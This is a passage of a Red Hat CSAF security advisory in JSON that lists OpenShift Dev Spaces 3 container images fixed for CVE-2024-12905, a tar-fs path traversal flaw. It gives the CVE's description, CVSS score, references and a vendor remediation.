"name": "devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le"
},
"product_reference": "devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64"
},
"product_reference": "devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x"
},
"product_reference": "devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64"
},
"product_reference": "devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x"
},
"product_reference": "devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le"
},
"product_reference": "devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64"
},
"product_reference": "devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le"
},
"product_reference": "devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x"
},
"product_reference": "devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64"
},
"product_reference": "devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le"
},
"product_reference": "devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x"
},
"product_reference": "devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64"
},
"product_reference": "devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x"
},
"product_reference": "devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
},
"product_reference": "devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-12905",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2025-03-27T17:02:14.911888+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2355460"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the tar-fs package for Node.js. In affected versions, unauthorized file writes or overwrites outside the intended extraction directory can occur when extracting a maliciously crafted tar file. The issue is associated with index.js in the tar-fs package.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tar-fs: link following and path traversal via maliciously crafted tar file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as an important severity because it allows attackers to extract a malicious tar file that can write or overwrite files outside the intended directory. This occurs due to improper handling of link resolution and pathname limitations. The risk is high for systems that automatically extract tar files, as it can lead to data corruption or unauthorized file modifications without user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-12905"
},
{
"category": "external",
"summary": "RHBZ#2355460",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2355460"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-12905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12905"
},
{
"category": "external",
"summary": "https://github.com/mafintosh/tar-fs/commit/a1dd7e7c7f4b4a8bd2ab60f513baca573b44e2ed",
"url": "https://github.com/mafintosh/tar-fs/commit/a1dd7e7c7f4b4a8bd2ab60f513baca573b44e2ed"
}
],
"release_date": "2025-03-27T16:25:34.410000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-05-28T02:39:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
